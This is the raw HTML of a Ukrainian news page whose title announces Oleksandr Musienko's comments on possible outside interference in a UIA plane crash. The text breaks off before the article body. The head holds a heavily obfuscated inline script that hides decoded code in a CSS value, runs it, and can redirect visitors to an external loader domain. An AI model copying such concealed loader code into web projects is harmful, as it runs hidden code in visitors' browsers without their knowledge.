<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>Александр Мусиенко рассказал о возможности крушения самолета МАУ из-за внешнего вмешательства | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="Александр Мусиенко рассказал о возможности крушения самолета МАУ из-за внешнего вмешательства "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/wp-content/uploads/2020/01/oleksandr-musiyenko-1-1.jpg"/><meta property="og:type" content="article" /><meta property="og:image:width" content="460" /><meta property="og:image:height" content="372" /><meta property="og:image:alt" content="Александр Мусиенко рассказал о возможности крушения самолета МАУ из-за внешнего вмешательства " /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='mo_openid_admin_settings_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/mo_openid_style.css?version=5.0.6' type='text/css' media='all' /><link rel='stylesheet' id='mo_openid_admin_settings_phone_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/phone.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-social-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-social.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-main-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap.min-preview.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-font-awesome-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/font-awesome.min.css?version=4.8' type='text/css' media='all' /><link rel='stylesheet' id='bootstrap_style_ass-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-tour-standalone.css?version=5.1.4' type='text/css' media='all' /><link rel='stylesheet' id='wp-block-library-css' href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/jquery.cookie.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/social_login.js'></script><meta name="description" content="В США допускают, что Иран по ошибке сбил самолет МАУ" /><meta property="og:description" content="В США допускают, что Иран по ошибке сбил самолет МАУ" /><meta name="keywords" content="авиакатастрофа в тегеране,александр мусиенко,новости общества,эксклюзивные новости" /><link rel="canonical" href="https://enovosty.com/news_society/full/901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva" /><meta property="og:url" content="https://enovosty.com/news_society/full/901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva" /><style>.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><style>.wp-polls .pollbar{margin:1px;font-size:6px;line-height:8px;height:8px;background-image:url('https://enovosty.com/wp-content/plugins/wp-polls/images/default/pollbg.gif');border:1px solid #c8c8c8}</style><link rel="amphtml" href="https://enovosty.com/news_society/full/901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4789439';cpage = ''
</script><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}table.social{width:50%!important}.swp_share_button{height:max-content!important}.swp_social_panel{margin-bottom:0px!important;margin-top:0px!important}</style><link rel="preload" as="style" disabled type="text/css" rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/mainstyle.css" /><script type="text/javascript">!function(){var mt="",t="Tag",e="natural",vt="src",st="loader",r="arg",pt="style",gt="text",n="ready",ht=":",a="STC",yt="script",o="image",i="parent",c="append",u="By",l="?",bt="IFRAME",f="add",d="*",A="Name",wt="code",m="Listener",v="no",s="https",p="m",g="Int",h="bold",y="green",b="c",St="_",Ct="write",w="Window",S="Timeout",C="al",Et="call",E="background",M="set",O="IAAAAUEBAAAACw",k="from",Mt="FRAME",B="has",Ot="href",D="Uza",kt="Document",I="create",Bt="Node",F="Of",R="AAA",j="remove",Dt="java",N="Computed",Q="2",It="bind",T="com",Z=".",x=";",Ft="cookie",Rt="close",H="base",L="GODlh",U="query",q="Property",z="HM",G='"',J="weight",jt="substr",Nt="warn",P="Selector",Qt="floor",W="parse",X="Storage",Y="d1e",_="timeout",Tt="id",Zt="cdn",xt="location",Ht="document",K="AAAQABAAACAk",V="Height",Lt="random",Ut="type",qt="head",zt="Em",$="ttt",tt="Loaded",et="Event",rt=")",Gt="Image",Jt="loading",nt="%",Pt="&",Wt="name",at="S",Xt="length",ot="@import",it="local",ct="font",Yt=",",ut="Style",lt="Descriptor",ft="'",dt="Child",At="color",_t="get",Kt="1",Vt=" ",$t="ZZZ2m",te="data",ee="gif",re="Own",ne="debug",ae="Math",oe="Item",ie="Content",ce="link",ue="complete",le="load",fe="Attribute",de="(",Ae="=",me="AQABA",ve="Elements",se="replace",pe="DOMContent",ge="match",he="content",ye="NO",be="key",we="/",Se="f4FFv",Ce="State",Ee="R1cj",Me="Element",Oe="atob",ke="-",Be="MSStream",De="<",Ie="Object",Fe="opener",Re="R0l",je=">",Ne="disabled",Qe="console",Te="r",Ze="index",xe="QBADs",He="prototype",Le="YXJnb24",Ue="All",qe=$+$t,ze=te+ht+o+we+ee+x+H,Ge=(Yt=Yt,O+R),Je=Re+L+me,Pe=K+xe+Ae,We=C+Ee+D+z+Ae,Xe=(St=St,De+ye),Ye=at+je,_e=I+Me,Ke=_t+ve+u+t+A,Ve=c+dt,$e=he+w,tr=_t+re+q+lt,er=n+Ce,rr=f+et+m,nr=U+P+Ue,ar=j+dt,or=M+S,ir=W+g,cr=_t+N+ut,ur=Le+Ae,lr=Q+Ae+Kt,fr=nt+b,dr=At+ht+y+x+ct+ke+J+ht+h,Ar=it+X,mr=_t+oe,vr=Ze+F,sr=Y+Ae,pr=j+oe,gr=s+ht+we+we,hr=Z+T+we+l+Te+Ae,yr=(Pt=Pt,gt+ie),br=de+rt+x,wr=St+p,Sr=B+fe,Cr=ot+Vt+ft,Er=ft+x,Mr=De+pt+je,Or=we+d,kr=d+we,Br=De+we+pt+je,Dr=e+V,Ir=i+Bt,Fr=pe+tt,Rr=le+Vt+r,jr=E+Gt,Nr=G+rt,Qr=(ht=ht,Jt+Vt+k+Vt+a),Tr=a+Vt+_,Zr=v+Vt+a;!function(){var t=window,i=t[Ht],e=Mt,r=ne,n=Dt,c=n+yt,a=wt,o=zt+a,u=0,l=1,f=2,d=3,A=10,m=8*f,v=A*A,s=m*m,p=s*s,g=s*d+d*(m+l),h=qe,y=Se,b=st,w=b+Zt,S=ze+m*f*f+Yt,C=Ge,E=S+Je+C+Pe,M=t[ae][Qt],O=t[ae][Lt],k=function(t){i[Ct](t)},B=u,D=m,I=u,F=u,R=function(){},j=We;try{if(t[Fe][St+h]==y)return t[Fe][St+h]=mt,k(Xe+e+Ye),i[Rt]()}catch(t){}var N=i[_e](bt),Q=i[Ke](qt)[0],T=ot();N[Wt]=T,Q[Ve](N);var Z,x,H,L,U=T?t[T]:N[$e],q=u;try{H=U[Ht]}catch(t){return}try{Z=U[Ie][tr](U[kt][He],er)[_t][It](i),x=H[_e][It](i),L=U[Oe],j=L(j),q=!!U[Be]}catch(t){q=l}if(q)return ut(),ct();var z=new U[Gt],G=H[rr],J=(H[nr][It](i),U[Bt][He]),P=J[Ve],W=J[ar],X=(H[Ke][It](i),U[or][It](t)),Y=U[ir],_=U[cr][It](t),K=x[It](i,yt);k=H[Ct][It](i),M=U[ae][Qt],O=U[ae][Lt];var V=L(ur);H[Ft][ge](V+St+r+lr)&&(R=U[Qe][Nt][It](U[Qe],fr+o,dr)),z[vt]=E;for(var $=U[Ar]||[],tt=0;tt<$[Xt];tt++){var et=$[be](tt);if(Y(et[jt](0,d),m)+mt==et[jt](d)){var rt=$[mr](et);if(rt[Xt]<v&&rt[vr](sr)==u)return $[pr](et),t[xt]=gr+w+hr+t[xt]+Pt+rt}}var nt=ot(),at=K();function ot(){return wr+M(O()*p*p)}function it(t){dt(),B||(F=ut(l),I=ct(l),t())}function ct(t){var e=ft(ce,Ne);return e&&e[Sr](Ot)?lt(Cr+e[Ot]+Er,t):e}function ut(t){var e=ft(yt,Ut,pt);if(e)return lt(e[gt],t)}function lt(t,e){if(k(Mr+t+Or+ot()+kr+Br),e)return ft(pt)}function ft(t,e,r){for(var n=i[Ke](t),a=n[Xt];-1<--a;)if(!e||n[a][Sr](e)&&(!r||n[a][e]==r))return n[a]}function dt(){z[ue]?z[Dr]||(B=l,I&&I[Ir][ar](I),F&&F[Ir][ar](F)):D--&&X(dt,l)}function At(){if(Z()==Jt)return G[Et](i,Fr,At);R(Rr);var t,e=x(pt);e[Tt]=j,P[Et](Q,e);var r=_(e)[jr];if(r[Xt]>v){var n=K(),a=r[jt](g)[se](Nr,mt),o=ot();U[o]=P[It](Q,n),t=a[jt](m*f),W[Et](Q,e),n[yr]=L(t),U[xt]=c+ht+o+br,R(Qr)}else Z()!=ue?(R(Tr),X(At,s)):R(Zr)}t[nt]=it[It](t,At),at[yr]=nt+br,P[Et](Q,at)}()}();</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4789439&amp;a=3509" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script async src='https://www.googletagservices.com/tag/js/gpt.js'></script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});
</script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};admixerML.defineSlot({z: '9a399316-86c0-4d6c-a6f1-676a36437a90', ph: 'admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069', i: 'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9'});admixerML.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div class="container"> <div style="margin-top:3px;position:relative;"> <div id='admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069');});</script><div id="right_ban"></div> <div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/news_society-ukr/full/901-oleksandr-musiyenko-rozpoviv-pro-mozhlivist-katastrofi-ukrainskogo-litaka-mau-vnaslidok-zovnishnogo-vtruchannya-u">Укр</a></div> </div> <div class="cls"></div><div id="header" style="padding-top: 0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/news_society/full/901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/news_society/full/901-aleksandr-musienko-rasskazal-o-vozmozhnosti-krusheniya-ukrainskogo-samoleta-mau-v-rezultate-vneshnego-vmeshatelstva?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" /></a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>24.32</td><td>23.73</td><td>25.14</td> </tr> <tr class="tr_white"><td>EUR</td><td>27.00</td><td>26.20</td><td>27.75</td> </tr> <tr><td>RUB</td><td>0.40</td><td>0.30</td><td>0.38</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>510.82</td><td>0.23</td><td>20:36 09.01.2020</td> </tr> <tr class="tr_white"> <td>UX</td><td>1528.44</td><td>-0.11</td><td>17:00 09.01.2020</td> </tr> <tr> <td>RTS</td><td>1601.74</td><td>0.80</td><td>17:51 09.01.2020</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>65.72</td><td>+0.43</td><td style="text-transform:uppercase;">Jan</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>67.49</td><td>-0.84</td><td style="text-transform:uppercase;">Aug</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>630.25</td><td>-0.52</td><td style="text-transform:uppercase;">Aug</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy"> <img src="https://enovosty.com/wp-content/themes/eizvestia/img/afisha3.png" width="56" alt="Деловая афиша" title="Деловая афиша" />Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li><a href="https://enovosty.com/news_kiev">Киев</a></li><li><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li class="current-menu-item"><a href="https://enovosty.com/news_society">Общество</a></li><li><a href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a href="https://enovosty.com/news_incidents">Происшествия</a></li><li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li><a href="https://enovosty.com/politika">Политика</a></li><li><a href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li><li><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li></ul></li><li id="menu-item-4513417" ><a href="https://enovosty.com/specproekty/rynok-zemli">Рынок земли</a></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div id="sidebarLeft_n" style="width:210px;"><script>jQuery(document).ready(function($){$('#slider').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><div class="topnews_single slide"><p style="padding: 0 7px;
font-weight: 700;
font-family: arial,verdana,tahoma;
